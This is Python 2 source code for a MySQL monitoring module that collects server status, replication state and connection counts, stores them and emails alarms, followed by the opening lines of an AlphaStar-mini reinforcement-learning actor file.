if len(AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type,create_time__gte=time)) <=2:
new_alarm.send_mail = 0
new_alarm.save()
return False
else:
return True
else:
new_alarm = Alarm(send_mail=0, db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm.save()
return False
def check_ifok(instance,num):
alarm_type = alarm_list[num]
mysql_monitor = MySQL_monitor.objects.get(instance_id=instance.id)
if AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type)[:1]:
AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type).delete()
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),'ok', num)
def mon_basic(instance,db_account):
mysql_monitor = MySQL_monitor.objects.get(instance=instance.id)
now_time = timezone.now()
try:
py = prpcrypt()
conn = MySQLdb.connect(host=instance.ip, user=db_account.user, passwd=py.decrypt(db_account.passwd), port=int(instance.port), connect_timeout=3, charset='utf8')
conn.autocommit(True)
cur = conn.cursor()
conn.select_db('information_schema')
check_ifok(instance,7)
############################# CHECK MYSQL ####################################################
mysql_variables = get_mysql_variables(cur)
mysql_status = get_mysql_status(cur)
time.sleep(1)
mysql_status_2 = get_mysql_status(cur)
############################# GET VARIABLES ###################################################
version = get_item(mysql_variables, 'version')
key_buffer_size = get_item(mysql_variables, 'key_buffer_size')
sort_buffer_size = get_item(mysql_variables, 'sort_buffer_size')
join_buffer_size = get_item(mysql_variables, 'join_buffer_size')
max_connections = get_item(mysql_variables, 'max_connections')
max_connect_errors = get_item(mysql_variables, 'max_connect_errors')
open_files_limit = get_item(mysql_variables, 'open_files_limit')
table_open_cache = get_item(mysql_variables, 'table_open_cache')
max_tmp_tables = get_item(mysql_variables, 'max_tmp_tables')
max_heap_table_size = get_item(mysql_variables, 'max_heap_table_size')
max_allowed_packet = get_item(mysql_variables, 'max_allowed_packet')
thread_cache_size = get_item(mysql_variables, 'thread_cache_size')
############################# GET INNODB INFO ##################################################
# innodb variables
innodb_version = get_item(mysql_variables, 'innodb_version')
innodb_buffer_pool_instances = get_item(mysql_variables, 'innodb_buffer_pool_instances')
innodb_buffer_pool_size = get_item(mysql_variables, 'innodb_buffer_pool_size')
innodb_doublewrite = get_item(mysql_variables, 'innodb_doublewrite')
innodb_file_per_table = get_item(mysql_variables, 'innodb_file_per_table')
innodb_flush_log_at_trx_commit = get_item(mysql_variables, 'innodb_flush_log_at_trx_commit')
innodb_flush_method = get_item(mysql_variables, 'innodb_flush_method')
innodb_force_recovery = get_item(mysql_variables, 'innodb_force_recovery')
innodb_io_capacity = get_item(mysql_variables, 'innodb_io_capacity')
innodb_read_io_threads = get_item(mysql_variables, 'innodb_read_io_threads')
innodb_write_io_threads = get_item(mysql_variables, 'innodb_write_io_threads')
# innodb status
innodb_buffer_pool_pages_total = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_total'))
innodb_buffer_pool_pages_data = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_data'))
innodb_buffer_pool_pages_dirty = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_dirty'))
innodb_buffer_pool_pages_flushed = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_flushed'))
innodb_buffer_pool_pages_free = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_free'))
innodb_buffer_pool_pages_misc = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_misc'))
innodb_buffer_pool_wait_free = int(get_item(mysql_status, 'Innodb_buffer_pool_wait_free'))
if innodb_buffer_pool_pages_misc > 18046744073709540000:
innodb_buffer_pool_pages_misc = 0
innodb_page_size = int(get_item(mysql_status, 'Innodb_page_size'))
innodb_pages_created = int(get_item(mysql_status, 'Innodb_pages_created'))
innodb_pages_read = int(get_item(mysql_status, 'Innodb_pages_read'))
innodb_pages_written = int(get_item(mysql_status, 'Innodb_pages_written'))
innodb_row_lock_current_waits = int(get_item(mysql_status, 'Innodb_row_lock_current_waits'))
innodb_row_lock_time = int(get_item(mysql_status, 'Innodb_row_lock_time'))
innodb_row_lock_waits = int(get_item(mysql_status, 'Innodb_row_lock_waits'))
innodb_log_waits = int(get_item(mysql_status, 'Innodb_log_waits'))
# innodb persecond info
innodb_buffer_pool_read_requests_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_read_requests')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_read_requests'))
innodb_buffer_pool_reads_persecond = int(get_item(mysql_status_2, 'Innodb_buffer_pool_reads')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_reads'))
innodb_buffer_pool_write_requests_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_write_requests')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_write_requests'))
innodb_buffer_pool_pages_flushed_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_pages_flushed')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_pages_flushed'))
innodb_rows_deleted_persecond = int(get_item(mysql_status_2, 'Innodb_rows_deleted')) - int(
get_item(mysql_status, 'Innodb_rows_deleted'))
innodb_rows_inserted_persecond = int(get_item(mysql_status_2, 'Innodb_rows_inserted')) - int(
get_item(mysql_status, 'Innodb_rows_inserted'))
innodb_rows_read_persecond = int(get_item(mysql_status_2, 'Innodb_rows_read')) - int(
get_item(mysql_status, 'Innodb_rows_read'))
innodb_rows_updated_persecond = int(get_item(mysql_status_2, 'Innodb_rows_updated')) - int(
get_item(mysql_status, 'Innodb_rows_updated'))
############################# GET STATUS ##################################################
connect = 1
uptime = get_item(mysql_status, 'Uptime')
open_files = get_item(mysql_status, 'Open_files')
open_tables = get_item(mysql_status, 'Open_tables')
opened_tables = get_item(mysql_status, 'Opened_tables')
threads_connected = get_item(mysql_status, 'Threads_connected')
threads_running = get_item(mysql_status, 'Threads_running')
threads_created = get_item(mysql_status, 'Threads_created')
threads_cached = get_item(mysql_status, 'Threads_cached')
# threads_waits = 20
max_used_connections = get_item(mysql_status, 'Max_used_connections')
connections = get_item(mysql_status, 'Connections')
aborted_clients = get_item(mysql_status, 'Aborted_clients')
aborted_connects = get_item(mysql_status, 'Aborted_connects')
key_blocks_not_flushed = get_item(mysql_status, 'Key_blocks_not_flushed')
key_blocks_unused = get_item(mysql_status, 'Key_blocks_unused')
key_blocks_used = get_item(mysql_status, 'Key_blocks_used')
slow_queries = int(get_item(mysql_status, 'Slow_queries'))
############################# GET STATUS PERSECOND ##################################################
threads_created_percond = int(get_item(mysql_status_2, 'Threads_created')) - int(threads_created)
connections_persecond = int(get_item(mysql_status_2, 'Connections')) - int(get_item(mysql_status, 'Connections'))
bytes_received_persecond = (int(get_item(mysql_status_2, 'Bytes_received')) - int(
get_item(mysql_status, 'Bytes_received'))) / 1024
bytes_sent_persecond = (int(get_item(mysql_status_2, 'Bytes_sent')) - int(
get_item(mysql_status, 'Bytes_sent'))) / 1024
com_select_persecond = int(get_item(mysql_status_2, 'Com_select')) - int(get_item(mysql_status, 'Com_select'))
com_insert_persecond = int(get_item(mysql_status_2, 'Com_insert')) - int(get_item(mysql_status, 'Com_insert'))
com_update_persecond = int(get_item(mysql_status_2, 'Com_update')) - int(get_item(mysql_status, 'Com_update'))
com_delete_persecond = int(get_item(mysql_status_2, 'Com_delete')) - int(get_item(mysql_status, 'Com_delete'))
com_commit_persecond = int(get_item(mysql_status_2, 'Com_commit')) - int(get_item(mysql_status, 'Com_commit'))
com_rollback_persecond = int(get_item(mysql_status_2, 'Com_rollback')) - int(get_item(mysql_status, 'Com_rollback'))
questions_persecond = int(get_item(mysql_status_2, 'Questions')) - int(get_item(mysql_status, 'Questions'))
queries_persecond = int(get_item(mysql_status_2, 'Queries')) - int(get_item(mysql_status, 'Queries'))
transaction_persecond = (int(get_item(mysql_status_2, 'Com_commit')) + int(
get_item(mysql_status_2, 'Com_rollback'))) - (
int(get_item(mysql_status, 'Com_commit')) + int(get_item(mysql_status, 'Com_rollback')))
created_tmp_disk_tables_persecond = int(get_item(mysql_status_2, 'Created_tmp_disk_tables')) - int(
get_item(mysql_status, 'Created_tmp_disk_tables'))
created_tmp_files_persecond = int(get_item(mysql_status_2, 'Created_tmp_files')) - int(
get_item(mysql_status, 'Created_tmp_files'))
created_tmp_tables_persecond = int(get_item(mysql_status_2, 'Created_tmp_tables')) - int(
get_item(mysql_status, 'Created_tmp_tables'))
table_locks_immediate_persecond = int(get_item(mysql_status_2, 'Table_locks_immediate')) - int(
get_item(mysql_status, 'Table_locks_immediate'))
table_locks_waited_persecond = int(get_item(mysql_status_2, 'Table_locks_waited')) - int(
get_item(mysql_status, 'Table_locks_waited'))
key_read_requests_persecond = int(get_item(mysql_status_2, 'Key_read_requests')) - int(
get_item(mysql_status, 'Key_read_requests'))
key_reads_persecond = int(get_item(mysql_status_2, 'Key_reads')) - int(get_item(mysql_status, 'Key_reads'))
key_write_requests_persecond = int(get_item(mysql_status_2, 'Key_write_requests')) - int(
get_item(mysql_status, 'Key_write_requests'))
key_writes_persecond = int(get_item(mysql_status_2, 'Key_writes')) - int(get_item(mysql_status, 'Key_writes'))
############################# GET MYSQL HITRATE ##################################################
if (string.atof(get_item(mysql_status, 'Qcache_hits')) + string.atof(get_item(mysql_status, 'Com_select'))) <> 0:
query_cache_hitrate = string.atof(get_item(mysql_status, 'Qcache_hits')) / (
string.atof(get_item(mysql_status, 'Qcache_hits')) + string.atof(get_item(mysql_status, 'Com_select')))
query_cache_hitrate = "%9.2f" % query_cache_hitrate
else:
query_cache_hitrate = 0
if string.atof(get_item(mysql_status, 'Connections')) <> 0:
thread_cache_hitrate = 1 - string.atof(get_item(mysql_status, 'Threads_created')) / string.atof(
get_item(mysql_status, 'Connections'))
thread_cache_hitrate = "%9.2f" % thread_cache_hitrate
else:
thread_cache_hitrate = 0
if string.atof(get_item(mysql_status, 'Key_read_requests')) <> 0:
key_buffer_read_rate = 1 - string.atof(get_item(mysql_status, 'Key_reads')) / string.atof(
get_item(mysql_status, 'Key_read_requests'))
key_buffer_read_rate = "%9.2f" % key_buffer_read_rate
else:
key_buffer_read_rate = 0
if string.atof(get_item(mysql_status, 'Key_write_requests')) <> 0:
key_buffer_write_rate = 1 - string.atof(get_item(mysql_status, 'Key_writes')) / string.atof(
get_item(mysql_status, 'Key_write_requests'))
key_buffer_write_rate = "%9.2f" % key_buffer_write_rate
else:
key_buffer_write_rate = 0
if (string.atof(get_item(mysql_status, 'Key_blocks_used')) + string.atof(
get_item(mysql_status, 'Key_blocks_unused'))) <> 0:
key_blocks_used_rate = string.atof(get_item(mysql_status, 'Key_blocks_used')) / (
string.atof(get_item(mysql_status, 'Key_blocks_used')) + string.atof(
get_item(mysql_status, 'Key_blocks_unused')))
key_blocks_used_rate = "%9.2f" % key_blocks_used_rate
else:
key_blocks_used_rate = 0
if (string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) + string.atof(
get_item(mysql_status, 'Created_tmp_tables'))) <> 0:
created_tmp_disk_tables_rate = string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) / (
string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) + string.atof(
get_item(mysql_status, 'Created_tmp_tables')))
created_tmp_disk_tables_rate = "%9.2f" % created_tmp_disk_tables_rate
else:
created_tmp_disk_tables_rate = 0
if string.atof(max_connections) <> 0:
connections_usage_rate = string.atof(threads_connected) / string.atof(max_connections)
connections_usage_rate = "%9.2f" % connections_usage_rate
else:
connections_usage_rate = 0
if string.atof(open_files_limit) <> 0:
open_files_usage_rate = string.atof(open_files) / string.atof(open_files_limit)
open_files_usage_rate = "%9.2f" % open_files_usage_rate
else:
open_files_usage_rate = 0
if string.atof(table_open_cache) <> 0:
open_tables_usage_rate = string.atof(open_tables) / string.atof(table_open_cache)
open_tables_usage_rate = "%9.2f" % open_tables_usage_rate
else:
open_tables_usage_rate = 0
# repl
slave_status = cur.execute('show slave status;')
if slave_status <> 0:
role = 'slave'
role_new = 's'
else:
role = 'master'
role_new = 'm'
############################# INSERT INTO SERVER ##################################################
sql_insert = "replace into mysql_status(db_ip,db_port,connect,role,uptime,version,max_connections,max_connect_errors,open_files_limit,table_open_cache,max_tmp_tables,max_heap_table_size,max_allowed_packet,open_files,open_tables,threads_connected,threads_running,threads_created,threads_cached,connections,aborted_clients,aborted_connects,connections_persecond,bytes_received_persecond,bytes_sent_persecond,com_select_persecond,com_insert_persecond,com_update_persecond,com_delete_persecond,com_commit_persecond,com_rollback_persecond,questions_persecond,queries_persecond,transaction_persecond,created_tmp_tables_persecond,created_tmp_disk_tables_persecond,created_tmp_files_persecond,table_locks_immediate_persecond,table_locks_waited_persecond,key_buffer_size,sort_buffer_size,join_buffer_size,key_blocks_not_flushed,key_blocks_unused,key_blocks_used,key_read_requests_persecond,key_reads_persecond,key_write_requests_persecond,key_writes_persecond,innodb_version,innodb_buffer_pool_instances,innodb_buffer_pool_size,innodb_doublewrite,innodb_file_per_table,innodb_flush_log_at_trx_commit,innodb_flush_method,innodb_force_recovery,innodb_io_capacity,innodb_read_io_threads,innodb_write_io_threads,innodb_buffer_pool_pages_total,innodb_buffer_pool_pages_data,innodb_buffer_pool_pages_dirty,innodb_buffer_pool_pages_flushed,innodb_buffer_pool_pages_free,innodb_buffer_pool_pages_misc,innodb_page_size,innodb_pages_created,innodb_pages_read,innodb_pages_written,innodb_row_lock_current_waits,innodb_buffer_pool_pages_flushed_persecond,innodb_buffer_pool_read_requests_persecond,innodb_buffer_pool_reads_persecond,innodb_buffer_pool_write_requests_persecond,innodb_rows_read_persecond,innodb_rows_inserted_persecond,innodb_rows_updated_persecond,innodb_rows_deleted_persecond,query_cache_hitrate,thread_cache_hitrate,key_buffer_read_rate,key_buffer_write_rate,key_blocks_used_rate,created_tmp_disk_tables_rate,connections_usage_rate,open_files_usage_rate,open_tables_usage_rate,create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
sql_update = "update mysql_status set db_ip=%s,db_port=%s,connect=%s,role=%s,uptime=%s,version=%s,max_connections=%s,max_connect_errors=%s,open_files_limit=%s,table_open_cache=%s,max_tmp_tables=%s,max_heap_table_size=%s,max_allowed_packet=%s,open_files=%s,open_tables=%s,threads_connected=%s,threads_running=%s,threads_created=%s,threads_cached=%s,connections=%s,aborted_clients=%s,aborted_connects=%s,connections_persecond=%s,bytes_received_persecond=%s,bytes_sent_persecond=%s,com_select_persecond=%s,com_insert_persecond=%s,com_update_persecond=%s,com_delete_persecond=%s,com_commit_persecond=%s,com_rollback_persecond=%s,questions_persecond=%s,queries_persecond=%s,transaction_persecond=%s,created_tmp_tables_persecond=%s,created_tmp_disk_tables_persecond=%s,created_tmp_files_persecond=%s,table_locks_immediate_persecond=%s,table_locks_waited_persecond=%s,key_buffer_size=%s,sort_buffer_size=%s,join_buffer_size=%s,key_blocks_not_flushed=%s,key_blocks_unused=%s,key_blocks_used=%s,key_read_requests_persecond=%s,key_reads_persecond=%s,key_write_requests_persecond=%s,key_writes_persecond=%s,innodb_version=%s,innodb_buffer_pool_instances=%s,innodb_buffer_pool_size=%s,innodb_doublewrite=%s,innodb_file_per_table=%s,innodb_flush_log_at_trx_commit=%s,innodb_flush_method=%s,innodb_force_recovery=%s,innodb_io_capacity=%s,innodb_read_io_threads=%s,innodb_write_io_threads=%s,innodb_buffer_pool_pages_total=%s,innodb_buffer_pool_pages_data=%s,innodb_buffer_pool_pages_dirty=%s,innodb_buffer_pool_pages_flushed=%s,innodb_buffer_pool_pages_free=%s,innodb_buffer_pool_pages_misc=%s,innodb_page_size=%s,innodb_pages_created=%s,innodb_pages_read=%s,innodb_pages_written=%s,innodb_row_lock_current_waits=%s,innodb_buffer_pool_pages_flushed_persecond=%s,innodb_buffer_pool_read_requests_persecond=%s,innodb_buffer_pool_reads_persecond=%s,innodb_buffer_pool_write_requests_persecond=%s,innodb_rows_read_persecond=%s,innodb_rows_inserted_persecond=%s,innodb_rows_updated_persecond=%s,innodb_rows_deleted_persecond=%s,query_cache_hitrate=%s,thread_cache_hitrate=%s,key_buffer_read_rate=%s,key_buffer_write_rate=%s,key_blocks_used_rate=%s,created_tmp_disk_tables_rate=%s,connections_usage_rate=%s,open_files_usage_rate=%s,open_tables_usage_rate=%s,create_time=%s where db_ip=%s and db_port=%s; "
sql2 = "insert into mysql_status_his(db_ip,db_port,connect,role,uptime,version,max_connections,max_connect_errors,open_files_limit,table_open_cache,max_tmp_tables,max_heap_table_size,max_allowed_packet,open_files,open_tables,threads_connected,threads_running,threads_created,threads_cached,connections,aborted_clients,aborted_connects,connections_persecond,bytes_received_persecond,bytes_sent_persecond,com_select_persecond,com_insert_persecond,com_update_persecond,com_delete_persecond,com_commit_persecond,com_rollback_persecond,questions_persecond,queries_persecond,transaction_persecond,created_tmp_tables_persecond,created_tmp_disk_tables_persecond,created_tmp_files_persecond,table_locks_immediate_persecond,table_locks_waited_persecond,key_buffer_size,sort_buffer_size,join_buffer_size,key_blocks_not_flushed,key_blocks_unused,key_blocks_used,key_read_requests_persecond,key_reads_persecond,key_write_requests_persecond,key_writes_persecond,innodb_version,innodb_buffer_pool_instances,innodb_buffer_pool_size,innodb_doublewrite,innodb_file_per_table,innodb_flush_log_at_trx_commit,innodb_flush_method,innodb_force_recovery,innodb_io_capacity,innodb_read_io_threads,innodb_write_io_threads,innodb_buffer_pool_pages_total,innodb_buffer_pool_pages_data,innodb_buffer_pool_pages_dirty,innodb_buffer_pool_pages_flushed,innodb_buffer_pool_pages_free,innodb_buffer_pool_pages_misc,innodb_page_size,innodb_pages_created,innodb_pages_read,innodb_pages_written,innodb_row_lock_current_waits,innodb_buffer_pool_pages_flushed_persecond,innodb_buffer_pool_read_requests_persecond,innodb_buffer_pool_reads_persecond,innodb_buffer_pool_write_requests_persecond,innodb_rows_read_persecond,innodb_rows_inserted_persecond,innodb_rows_updated_persecond,innodb_rows_deleted_persecond,query_cache_hitrate,thread_cache_hitrate,key_buffer_read_rate,key_buffer_write_rate,key_blocks_used_rate,created_tmp_disk_tables_rate,connections_usage_rate,open_files_usage_rate,open_tables_usage_rate,create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (
instance.ip, int(instance.port), connect, role, uptime, version, max_connections, max_connect_errors, open_files_limit,
table_open_cache, max_tmp_tables, max_heap_table_size, max_allowed_packet, open_files, open_tables,
threads_connected, threads_running, threads_created, threads_cached, connections, aborted_clients,
aborted_connects, connections_persecond, bytes_received_persecond, bytes_sent_persecond, com_select_persecond,
com_insert_persecond, com_update_persecond, com_delete_persecond, com_commit_persecond, com_rollback_persecond,
questions_persecond, queries_persecond, transaction_persecond, created_tmp_tables_persecond,
created_tmp_disk_tables_persecond, created_tmp_files_persecond, table_locks_immediate_persecond,
table_locks_waited_persecond, key_buffer_size, sort_buffer_size, join_buffer_size, key_blocks_not_flushed,
key_blocks_unused, key_blocks_used, key_read_requests_persecond, key_reads_persecond, key_write_requests_persecond,
key_writes_persecond, innodb_version, innodb_buffer_pool_instances, innodb_buffer_pool_size, innodb_doublewrite,
innodb_file_per_table, innodb_flush_log_at_trx_commit, innodb_flush_method, innodb_force_recovery,
innodb_io_capacity, innodb_read_io_threads, innodb_write_io_threads, innodb_buffer_pool_pages_total,
innodb_buffer_pool_pages_data, innodb_buffer_pool_pages_dirty, innodb_buffer_pool_pages_flushed,
innodb_buffer_pool_pages_free, innodb_buffer_pool_pages_misc, innodb_page_size, innodb_pages_created,
innodb_pages_read, innodb_pages_written, innodb_row_lock_current_waits, innodb_buffer_pool_pages_flushed_persecond,
innodb_buffer_pool_read_requests_persecond, innodb_buffer_pool_reads_persecond,
innodb_buffer_pool_write_requests_persecond, innodb_rows_read_persecond, innodb_rows_inserted_persecond,
innodb_rows_updated_persecond, innodb_rows_deleted_persecond, query_cache_hitrate, thread_cache_hitrate,
key_buffer_read_rate, key_buffer_write_rate, key_blocks_used_rate, created_tmp_disk_tables_rate,
connections_usage_rate, open_files_usage_rate, open_tables_usage_rate,now_time,instance.ip, int(instance.port))
# print param
if not MysqlStatus.objects.filter(db_ip=instance.ip,db_port=instance.port).exists():
mysql_exec(sql_insert, param[:-2])
else:
mysql_exec(sql_update, param)
mysql_exec(sql2,param[:-2])
if mysql_monitor.check_connections:
alarm_type = 6
if mysql_monitor.connection_threshold <= int(threads_connected):
if record_alarm(mysql_monitor,alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), threads_connected,alarm_type)
else:
check_ifok(instance, alarm_type)
# check mysql connected
connected = cur.execute("select SUBSTRING_INDEX(host,':',1) as connect_server, user connect_user,db connect_db, count(SUBSTRING_INDEX(host,':',1)) as connect_count from information_schema.processlist where db is not null and db!='information_schema' and db !='performance_schema' group by connect_server,connect_user,connect_db;");
if connected:
for line in cur.fetchall():
sql = "insert into mysql_connected(db_ip,db_port,connect_server,connect_user,connect_db,connect_count,create_time) values(%s,%s,%s,%s,%s,%s,%s);"
param = (instance.ip, int(instance.port),line[0], line[1], line[2], line[3],now_time)
mysql_exec(sql, param)
#check replication
master_thread=cur.execute("select * from information_schema.processlist where COMMAND = 'Binlog Dump' or COMMAND = 'Binlog Dump GTID';")
slave_status=cur.execute('show slave status;')
datalist=[]
if master_thread >= 1:
datalist.append(int(1))
if slave_status <> 0:
datalist.append(int(1))
else:
datalist.append(int(0))
else:
datalist.append(int(0))
if slave_status <> 0:
datalist.append(int(1))
else:
datalist.append(int(0))
sql="delete from mysql_replication where db_ip=%s and db_port=%s;"
param =(instance.ip,instance.port)
mysql_exec(sql,param)
if slave_status <> 0:
gtid_mode=cur.execute("select * from information_schema.global_variables where variable_name='gtid_mode';")
result=cur.fetchone()
if result:
gtid_mode=result[1]
else:
gtid_mode='OFF'
datalist.append(gtid_mode)
read_only=cur.execute("select * from information_schema.global_variables where variable_name='read_only';")
result=cur.fetchone()
datalist.append(result[1])
#slave_info=cur.execute('show slave status;')
if instance.replchannel <> '0':
slave_info=cur.execute("show slave status for channel '%s';" %(instance.replchannel))
else :
slave_info=cur.execute('show slave status;')
result=cur.fetchone()
# print "result"
# print slave_info
master_server=result[1]
master_port=result[3]
slave_io_run=result[10]
slave_sql_run=result[11]
delay=result[32]
current_binlog_file=result[9]
current_binlog_pos=result[21]
master_binlog_file=result[5]
master_binlog_pos=result[6]
            try:
                slave_sql_running_state = result[44]
            except Exception, e:
                slave_sql_running_state = "NULL"
datalist.append(master_server)
datalist.append(master_port)
datalist.append(slave_io_run)
datalist.append(slave_sql_run)
datalist.append(delay)
datalist.append(current_binlog_file)
datalist.append(current_binlog_pos)
datalist.append(master_binlog_file)
datalist.append(master_binlog_pos)
datalist.append(0)
            datalist.append(slave_sql_running_state)
if instance.check_slave:
if (slave_io_run == "Yes") and (slave_sql_run == "Yes"):
alarm_type = 4
check_ifok(instance, alarm_type)
if instance.check_delay :
alarm_type = 5
if instance.delay_threshold <=int(delay) :
                            if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),delay,alarm_type)
else:
check_ifok(instance, alarm_type)
else:
alarm_type = 4
                    if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),{'iothread':slave_io_run,'sqlthread':slave_sql_run}, alarm_type)
elif master_thread >= 1:
gtid_mode=cur.execute("select * from information_schema.global_variables where variable_name='gtid_mode';")
result=cur.fetchone()
if result:
gtid_mode=result[1]
else:
gtid_mode='OFF'
datalist.append(gtid_mode)
read_only=cur.execute("select * from information_schema.global_variables where variable_name='read_only';")
result=cur.fetchone()
datalist.append(result[1])
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
datalist.append('---')
master=cur.execute('show master status;')
master_result=cur.fetchone()
datalist.append(master_result[0])
datalist.append(master_result[1])
binlog_file=cur.execute('show master logs;')
binlogs=0
if binlog_file:
for row in cur.fetchall():
binlogs = binlogs + row[1]
datalist.append(binlogs)
datalist.append('---')
else:
datalist=[]
result=datalist
if result:
datalist.append(now_time)
sql= "update mysql_replication set db_ip=%s,db_port=%s,is_master=%s,is_slave=%s,gtid_mode=%s,read_only=%s,master_server=%s,master_port=%s,slave_io_run=%s,slave_sql_run=%s,delay=%s,current_binlog_file=%s,current_binlog_pos=%s,master_binlog_file=%s,master_binlog_pos=%s,master_binlog_space=%s,slave_sql_running_state=%s,create_time where db_ip=%s and db_port=%s"
sql2= "insert into mysql_replication_his(db_ip,db_port,is_master,is_slave,gtid_mode,read_only,master_server,master_port,slave_io_run,slave_sql_run,delay,current_binlog_file,current_binlog_pos,master_binlog_file,master_binlog_pos,master_binlog_space,slave_sql_running_state,create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(instance.ip,instance.port,result[0],result[1],result[2],result[3],result[4],result[5],result[6],result[7],result[8],result[9],result[10],result[11],result[12],result[13],result[14],result[15],instance.ip,instance.port)
mysql_exec(sql,param)
mysql_exec(sql2, param[:-2])
cur.close()
conn.close()
# except Exception, e:
except MySQLdb.Error, e:
print e
time.sleep(3)
try:
conn = MySQLdb.connect(host=instance.ip, user=db_account.user, passwd=py.decrypt(db_account.passwd), port=int(instance.port), connect_timeout=3, charset='utf8')
cur = conn.cursor()
conn.select_db('information_schema')
except MySQLdb.Error, e:
connect = 0
downserver = MysqlStatus.objects.filter(db_ip=instance.ip, db_port=int(instance.port))[:1]
# now_time = now_time + datetime.timedelta(hours=8)
if downserver:
downserver[0].connect = 0
downserver[0].create_time = now_time
downserver[0].save()
else:
downserver = MysqlStatus(db_ip=instance.ip, db_port=int(instance.port),version='-1',create_time=now_time)
downserver.save()
alarm_type = 7
if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), alarm_type,alarm_type)
# sendmail_monitor(instance.id, mysql_monitor.mail_to.split(';'), alarm_type, alarm_type)
def get_mysql_status(cursor):
data=cursor.execute('show global status;');
data_list=cursor.fetchall()
data_dict={}
for item in data_list:
data_dict[item[0]] = item[1]
return data_dict
def get_mysql_variables(cursor):
cursor.execute('show global variables;')
data_list=cursor.fetchall()
data_dict={}
for item in data_list:
data_dict[item[0]] = item[1]
return data_dict
def get_mysql_version(cursor):
cursor.execute('select version();');
return cursor.fetchone()[0]
def get_item(data_dict,item):
try:
item_value = data_dict[item]
return item_value
except:
return '-1'
|
actor_plus_z.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
" The code for the actor using Z (the reward for imititing the expert in replays) in the actor-learner mode in the IMPALA architecture "
# modified from AlphaStar pseudo-code
import traceback
from time import time, sleep, strftime, localtime
import threading
import torch
from torch.optim import Adam
from pysc2.env.sc2_env import SC2Env, AgentInterfaceFormat, Agent, Race
from alphastarmini.core.rl.env_utils import SC2Environment, get_env_outcome
from alphastarmini.core.rl.utils import Trajectory, get_supervised_agent
from alphastarmini.core.rl.learner import Learner
from alphastarmini.core.rl import utils as U
from alphastarmini.lib import utils as L
# below packages are for test
from alphastarmini.core.ma.league import League
from alphastarmini.core.ma.coordinator import Coordinator
from alphastarmini.lib.hyper_parameters import Arch_Hyper_Parameters as AHP
from alphastarmini.lib.hyper_parameters import Training_Races as TR
from alphastarmini.lib.hyper_parameters import AlphaStar_Agent_Interface_Format_Params as AAIFP
# for replay reward
import os
import random
from pysc2.lib import point
from pysc2.lib import features as F
from pysc2 import run_configs
from s2clientprotocol import sc2api_pb2 as sc_pb
__author__ = "Ruo-Ze Liu"
debug = False
STEP_MUL = 8 # 1
GAME_STEPS_PER_EPISODE = 18000 # 9000
MAX_EPISODES = 1000 # 100
# gpu setting
ON_GPU = torch.cuda.is_available()
DEVICE = torch.device("cuda:0" if ON_GPU else "cpu")
torch.backends.cudnn.enabled = False
class ActorLoopPlusZ:
"""A single actor loop that generates trajectories.
We don't use batched inference here, but it was used in practice.
TODO: implement the batched version
"""
def __init__(self, player, coordinator, max_time_for_training = 60 * 60 * 24,
max_time_per_one_opponent=60 * 60 * 2,
max_frames_per_episode=22.4 * 60 * 15, max_frames=22.4 * 60 * 60 * 24,
max_episodes=MAX_EPISODES, use_replay_expert_reward=True,
replay_path="data/Replays/filtered_replays_1/", replay_version='3.16.1'):
self.player = player
self.player.add_actor(self)
if ON_GPU:
self.player.agent.agent_nn.to(DEVICE)
self.teacher = get_supervised_agent(player.race, model_type="sl")
if ON_GPU:
self.teacher.agent_nn.to(DEVICE)
        # the code below is not used because we can only create the env once we know the opponent information (e.g., race)
# AlphaStar: self.environment = SC2Environment()
self.coordinator = coordinator
self.max_time_for_training = max_time_for_training
self.max_time_per_one_opponent = max_time_per_one_opponent
self.max_frames_per_episode = max_frames_per_episode
self.max_frames = max_frames
self.max_episodes = max_episodes
